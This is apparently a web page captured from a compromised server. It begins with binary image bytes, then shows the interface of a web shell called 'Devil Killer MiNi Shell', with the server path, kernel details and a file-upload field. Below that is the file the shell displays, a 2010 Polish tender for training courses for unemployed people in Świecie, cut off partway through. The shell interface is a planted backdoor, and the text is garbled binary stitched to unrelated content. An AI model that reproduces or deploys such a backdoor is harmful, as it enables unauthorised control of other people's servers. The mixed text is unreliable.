JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101001/271837-N-2010.html

<p class="kh_header"><b>Świecie: Zorganizowanie i przeprowadzenie szkoleń grupowych dla osób bezrobotnych  wg części.</b><br>
<b>Numer ogłoszenia: 271837 - 2010; data zamieszczenia: 01.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świecki - Powiatowy Urząd Pracy w Świeciu , ul. Wojska Polskiego 195a, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 33 32 210, faks 52 33 32 253.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń grupowych dla osób bezrobotnych  wg części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I:
Szkolenie Podstawy obsługi komputera
1)	Liczba uczestników szkolenia: 30 osób bezrobotnych w 2 podgrupach 15 osobowych.
2)	Zajęcia teoretyczne i praktyczne muszą zostać przeprowadzone dla  dwóch podgrup 15 osobowych. 
3)	Liczba godzin szkolenia: 30 godzin zajęć teoretycznych i praktycznych (po 45 minut każda) w tym 1 godzina edukacyjna (45 minut) egzaminu wewnętrznego praktycznego dla każdej podgrupy. Łącznie 60 godzin edukacyjnych szkolenia dla wszystkich grup.
	4)    Program szkolenia każdej podgrupy musi obejmować między innymi następujące zagadnienia:
a)	3 godziny zajęć teoretycznych,
b)	26 godzin zajęć praktycznych,
c)	1 godzina egzaminu wewnętrznego praktycznego.
5)   Program i ilość godzin szkolenia musi obejmować:
a)	wprowadzenie do Windows XP:
-  podstawowa terminologia (1 godzina zajęć teoretycznych),
- włączanie i wyłączanie komputera, posługiwanie się myszką i klawiaturą (1 godzina zajęć praktycznych),
b)	podstawowa praca z plikami i folderami oraz nośnikami danych:
- praca z urządzeniami do przechowywania danych CD, DVD, dyskietka, pen driver (1 godzina zajęć praktycznych),
- tworzenie, edytowanie i usuwanie plików i folderów (1 godzina zajęć praktycznych),
- przenoszenie i kopiowanie plików i folderów oraz zmiana ich nazwy (1 godzina zajęć praktycznych),
- wyszukiwanie plików (1 godzina zajęć praktycznych),
- powielanie, przegrywanie i nagrywanie plików (1 godzina zajęć praktycznych),
c)	podstawowe zasady działania programu MS WORD (1 godzina zajęć teoretycznych),
d)	ćwiczenia z MS WORD (8 godzin zajęć praktycznych),
e)	Internet (1 godzina zajęć teoretycznych),
f)	wyszukiwanie konkretnych danych w wyszukiwarce internetowej (4 godziny zajęć praktycznych),
g)	Internetowa skrzynka pocztowa:
- zakładanie e-mail (2 godziny zajęć praktycznych),
- załączanie, wysyłanie i odbieranie plików i zdjęć (6 godzin zajęć praktycznych),
h)	egzamin wewnętrzny (1 godzina zajęć praktycznych z zakresu prac związanych z obsługą programu MS WORD i Internetu).
CZĘŚC II:
Szkolenie Konserwator powierzchni płaskich 
1)	Liczba uczestników szkolenia: 10 osób bezrobotnych.
2)	Zajęcia teoretyczne i praktyczne muszą zostać przeprowadzone dla grupy 10 osobowej łącznie. 
3)	Liczba godzin szkolenia: 32 godziny zajęć trwających po 45 minut w tym:
d)	4 godziny zajęć teoretycznych,
e)	27 godzin zajęć praktycznych,
f)	1 godzina egzaminu wewnętrznego praktycznego.
4)	Program i ilość godzin szkolenia musi obejmować:
i)	przepisy bezpieczeństwa i higieny pracy na stanowisku pracy (1 godzina zajęć teoretycznych),
j)	ochrona danych osobowych, tajemnica zawodowa (1 godzina zajęć teoretycznych),
k)	zasady utrzymania czystości i porządku w biurach, hotelach, handlowych i domach prywatnych 
(1 godzina zajęć teoretycznych),
l)	dobór środków czystości do sprzątanej powierzchni (1 godzin zajęć teoretycznych,),
m)	umiejętność prawidłowego zastosowania środków czystości (2 godzin zajęć praktycznych),
n)	wykonywanie prac związanych z porządkiem i czystością (24 godziny zajęć praktycznych),
o)	egzamin wewnętrzny (1 godzina zajęć praktycznych z zakresu prac związanych z konserwacją powierzchni płaskich).
CZĘŚĆ III:
Szkolenie Pomoc kuchenna
1)	Liczba uczestników szkolenia: 10 osób bezrobotnych.
2)	Zajęcia teoretyczne i praktyczne muszą zostać przeprowadzone dla grupy 10 osobowej łącznie. 
3)	Liczba godzin szkolenia: 56 godziny zajęć trwających po 45 minut w tym:
g)	8 godzin zajęć teoretycznych,
h)	47 godziny zajęć praktycznych,
i)	1 godzina egzaminu wewnętrznego praktycznego.
4)	Program i ilość godzin szkolenia musi obejmować:
p)	zasady bezpieczeństwa i higieny pracy na stanowisku pracy (1 godzina zajęć teoretycznych),
q)	omówienie procesów technologicznych w kuchni (2 godziny zajęć teoretycznych),
r)	wartości odżywcze pokarmów  (1 godzina zajęć teoretycznych),
s)	układanie menu (2 godziny zajęć praktycznych),
t)	metody i techniki przyrządzania potraw (29 godzin zajęć praktycznych),
u)	dekorowanie potraw (8 godzin zajęć praktycznych),
v)	zasady przechowywania i magazynowania artykułów spożywczych, surowców, półproduktów i produktów kulinarnych (3 godziny zajęć teoretycznych),
w)	zabezpieczanie surowców i wyrobów przed zepsuciem (2 godziny zajęć praktycznych),
x)	zasady żywienia zbiorowego (1 godzina zajęć teoretycznych),
y)	utrzymanie czystości naczyń, sprzętu i pomieszczenia kuchennego (6 godzin zajęć praktycznych),
z)	egzamin wewnętrzny (1 godzina zajęć praktycznych z zakresu prac związanych z przygotowaniem i dekorowaniem potraw).
CZĘŚĆ IV:
Szkolenie Operator wózka jezdniowego 
1)	Liczba uczestników szkolenia: grupa 15 osób bezrobotnych.
2)	Zajęcia teoretyczne muszą zostać przeprowadzone dla grupy 15 osobowej łącznie. 
3)   Liczba godzin szkolenie: 127  godzin zajęć, w tym: 
a) 47 godziny teorii z zakresu obsługi wózków jezdniowych, 
b) 5 godzin zajęć praktycznych z bezpiecznej wymiany butli ,
c) 75 godzin zajęć praktycznych z obsługi wózków jezdniowych (zajęcia praktyczne mają odbywać się w 5 grupach 3 osobowych z wykorzystaniem dwóch wózków jezdniowych równocześnie po jednym dla każdej grupy, po 15 godzin dla każdej z grup).
Szczegolowe informacje na temat przedmiotu zamowienia zawiera SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/ nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi załącznik nr 4 do SIWZ. 
Umowa w sprawie zamówienia publicznego będzie zawarta z Wykonawcą, którego oferta zostanie wybrana w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze oferty.
Umowa zostanie zawarta z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie.
              Zamawiający dopuszcza możliwość dokonania zmian w treści zawartej umowy. 
1.	Umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego i będących wynikiem: 
a)	nie podjęcia szkolenia przez osobę bezrobotną, 
b)	nieusprawiedliwionych nieobecności osób bezrobotnych na szkoleniu, 
c)	usprawiedliwionych nieobecności osób bezrobotnych z powodu podjęcia pracy lub innej pracy zarobkowej, 
Jeżeli  zmniejszenie liczby osób bezrobotnych nastąpi w pierwszych dniach zajęć Zamawiający zastrzega sobie prawo skierowania innych osób bezrobotnych celem uzupełnienia liczby osób odbywających szkolenie.
2.	W przypadku sytuacji określonych w §5 pkt. 1 zmianie ulega przeliczenie kosztu szkolenia. W takim przypadku koszt szkolenia stanowi iloczyn kosztu szkolenia jednej osoby bezrobotnej oraz rzeczywistej ilości osób , które zakończyły szkolenie.
3.	Umowa może ulec zmianie w wyniku następujących okoliczności ze strony Wykonawcy: zmiana kadry realizującej kurs w wyniku nieprzewidywalnych zdarzeń losowych (długotrwała choroba, śmierć, rozwiązanie stosunku pracy ze strony wykładowcy), których nie można było przewidzieć w dniu zawarcia umowy. 
4.	Zmiany do umowy zostaną wprowadzane przez zawarcie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.swiecie.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Świeciu
ul. Wojska Polskiego 195 a
86-100 Świecie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Świeciu
ul. Wojska Polskiego 195 a
86-100 Świecie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia są organizowane w ramach projektu systemowego
 Rozwiń Skrzydła(Poddziałanie 6.1.3) Programu Operacyjnego Kapitał Ludzki. Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego.
Celem działań realizowanych w ramach Europejskiego Funduszu Społecznego jest pomoc w rozwoju zatrudnienia poprzez promowanie możliwości zatrudnienia, ducha przedsiębiorczości, równych szans oraz inwestowania w zasoby ludzkie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I:
Szkolenie Podstawy obsługi komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I:
Szkolenie Podstawy obsługi komputera 
1)	Liczba uczestników szkolenia: 30 osób bezrobotnych w 2 podgrupach 15 osobowych.
2)	Zajęcia teoretyczne i praktyczne muszą zostać przeprowadzone dla  dwóch podgrup 15 osobowych. 
3)	Liczba godzin szkolenia: 30 godzin zajęć teoretycznych i praktycznych (po 45 minut każda) w tym 1 godzina edukacyjna (45 minut) egzaminu wewnętrznego praktycznego dla każdej podgrupy. Łącznie 60 godzin edukacyjnych szkolenia dla wszystkich grup.
	4)    Program szkolenia każdej podgrupy musi obejmować między innymi następujące zagadnienia:
a)	3 godziny zajęć teoretycznych,
b)	26 godzin zajęć praktycznych,
c)	1 godzina egzaminu wewnętrznego praktycznego.
5)   Program i ilość godzin szkolenia musi obejmować:
a)	wprowadzenie do Windows XP:
-  podstawowa terminologia (1 godzina zajęć teoretycznych),
- włączanie i wyłączanie komputera, posługiwanie się myszką i klawiaturą (1 godzina zajęć praktycznych),
b)	podstawowa praca z plikami i folderami oraz nośnikami danych:
- praca z urządzeniami do przechowywania danych CD, DVD, dyskietka, pen driver (1 godzina zajęć praktycznych),
- tworzenie, edytowanie i usuwanie plików i folderów (1 godzina zajęć praktycznych),
- przenoszenie i kopiowanie plików i folderów oraz zmiana ich nazwy (1 godzina zajęć praktycznych),
- wyszukiwanie plików (1 godzina zajęć praktycznych),
- powielanie, przegrywanie i nagrywanie plików (1 godzina zajęć praktycznych),
c)	podstawowe zasady działania programu MS WORD (1 godzina zajęć teoretycznych),
d)	ćwiczenia z MS WORD (8 godzin zajęć praktycznych),
e)	Internet (1 godzina zajęć teoretycznych),
f)	wyszukiwanie konkretnych danych w wyszukiwarce internetowej (4 godziny zajęć praktycznych),
g)	Internetowa skrzynka pocztowa:
- zakładanie e-mail (2 godziny zajęć praktycznych),
- załączanie, wysyłanie i odbieranie plików i zdjęć (6 godzin zajęć praktycznych),
h)	egzamin wewnętrzny (1 godzina zajęć praktycznych z zakresu prac związanych z obsługą programu MS WORD i Internetu)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚC II:
Szkolenie Konserwator powierzchni płaskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚC II:
Szkolenie Konserwator powierzchni płaskich 
1)	Liczba uczestników szkolenia: 10 osób bezrobotnych.
2)	Zajęcia teoretyczne i praktyczne muszą zostać przeprowadzone dla grupy 10 osobowej łącznie. 
3)	Liczba godzin szkolenia: 32 godziny zajęć trwających po 45 minut w tym:
d)	4 godziny zajęć teoretycznych,
e)	27 godzin zajęć praktycznych,
f)	1 godzina egzaminu wewnętrznego praktycznego.
4)	Program i ilość godzin szkolenia musi obejmować:
i)	przepisy bezpieczeństwa i higieny pracy na stanowisku pracy (1 godzina zajęć teoretycznych),
j)	ochrona danych osobowych, tajemnica zawodowa (1 godzina zajęć teoretycznych),
k)	zasady utrzymania czystości i porządku w biurach, hotelach, handlowych i domach prywatnych 
(1 godzina zajęć teoretycznych),
l)	dobór środków czystości do sprzątanej powierzchni (1 godzin zajęć teoretycznych,),
m)	umiejętność prawidłowego zastosowania środków czystości (2 godzin zajęć praktycznych),
n)	wykonywanie prac związanych z porządkiem i czystością (24 godziny zajęć praktycznych),
o)	egzamin wewnętrzny (1 godzina zajęć praktycznych z zakresu prac związanych z konserwacją powierzchni płaskich)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III:
Szkolenie Pomoc kuchenna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III:
Szkolenie Pomoc kuchenna 
1)	Liczba uczestników szkolenia: 10 osób bezrobotnych.
2)	Zajęcia teoretyczne i praktyczne muszą zostać przeprowadzone dla grupy 10 osobowej łącznie. 
3)	Liczba godzin szkolenia: 56 godziny zajęć trwających po 45 minut w tym:
g)	8 godzin zajęć teoretycznych,
h)	47 godziny zajęć praktycznych,
i)	1 godzina egzaminu wewnętrznego praktycznego.
4)	Program i ilość godzin szkolenia musi obejmować:
p)	zasady bezpieczeństwa i higieny pracy na stanowisku pracy (1 godzina zajęć teoretycznych),
q)	omówienie procesów technologicznych w kuchni (2 godziny zajęć teoretycznych),
r)	wartości odżywcze pokarmów  (1 godzina zajęć teoretycznych),
s)	układanie menu (2 godziny zajęć praktycznych),
t)	metody i techniki przyrządzania potraw (29 godzin zajęć praktycznych),
u)	dekorowanie potraw (8 godzin zajęć praktycznych),
v)	zasady przechowywania i magazynowania artykułów spożywczych, surowców, półproduktów i produktów kulinarnych (3 godziny zajęć teoretycznych),
w)	zabezpieczanie surowców i wyrobów przed zepsuciem (2 godziny zajęć praktycznych),
x)	zasady żywienia zbiorowego (1 godzina zajęć teoretycznych),
y)	utrzymanie czystości naczyń, sprzętu i pomieszczenia kuchennego (6 godzin zajęć praktycznych),
z)	egzamin wewnętrzny (1 godzina zajęć praktycznych z zakresu prac związanych z przygotowaniem i dekorowaniem potraw)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV:
Szkolenie Operator wózka jezdniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV:
Szkolenie Operator wózka jezdniowego 
1)	Liczba uczestników szkolenia: grupa 15 osób bezrobotnych.
